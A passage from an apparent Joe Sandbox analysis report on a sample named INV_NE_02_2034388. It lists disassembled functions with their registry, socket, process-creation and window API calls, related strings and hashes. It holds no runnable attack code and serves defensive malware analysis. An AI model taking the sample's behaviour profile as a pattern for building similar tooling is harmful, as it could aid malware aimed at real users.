                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                          • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                          • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                          • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                          Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                          • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                            • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                            • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                            • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                          • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                          • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                          • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                          Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                          • GetWindowLongW.USER32(00C711A8,000000F0), ref: 0048631F
                                          • GetWindowLongW.USER32(00C711A8,000000F0), ref: 00486354
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                          • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                          • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                          • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                          Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                          • WSAGetLastError.WSOCK32 ref: 00476221
                                          • closesocket.WSOCK32(00000000), ref: 0047624A
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                          • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                          • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                          • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                          Function 0045F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                          • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                          • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                          • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                          Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                          • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                          • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                          • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                          Function 0048B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0048B644
                                          • _memset.LIBCMT ref: 0048B653
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                          • CloseHandle.KERNEL32 ref: 0048B694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID: oL$doL
                                          • API String ID: 3277943733-3421622115
                                          • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                          • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                          • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                          • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                          Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                          • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                          • EncodePointer.KERNEL32(00000000), ref: 00424097
                                          • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                          • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                          • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                          • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                          Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 646b6e6f701bcb80f333d511d08e610e681205344f5486b80d29ddc92782b955
                                          • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                          • Opcode Fuzzy Hash: 646b6e6f701bcb80f333d511d08e610e681205344f5486b80d29ddc92782b955
                                          • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                          Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 7cc6289c2aa7324cbd4a80f658f4942adf24dac0538f3eacdd59aa7931d7e71f
                                          • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                          • Opcode Fuzzy Hash: 7cc6289c2aa7324cbd4a80f658f4942adf24dac0538f3eacdd59aa7931d7e71f
                                          • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                          Function 00485799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32(?), ref: 004857FB
                                          • GetMenuItemCount.USER32(00000000), ref: 00485832
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                                          • GetMenuItemID.USER32(?,?), ref: 004858C9
                                          • GetSubMenu.USER32(?,?), ref: 004858D7
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                          • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                                          • Opcode Fuzzy Hash: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                          • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                                          Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0045EF06
                                          • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                          • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                          • _memmove.LIBCMT ref: 0045EFFD
                                          • VariantClear.OLEAUT32(?), ref: 0045F04A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                          • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                          • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                          • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                          Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00462258
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                          • IsMenu.USER32(00000000), ref: 004622C3
                                          • CreatePopupMenu.USER32 ref: 004622F7
                                          • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                          • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                          • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                          • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                          Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                          • GetWindowRect.USER32(?,?), ref: 004017FE
                                          • ScreenToClient.USER32(?,?), ref: 0040181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                          • EndPaint.USER32(?,?), ref: 00401876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                          • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                                          • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                          • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                                          Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(004C57B0,00000000,00C711A8,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                          • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                          • ShowWindow.USER32(004C57B0,00000000,00C711A8,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
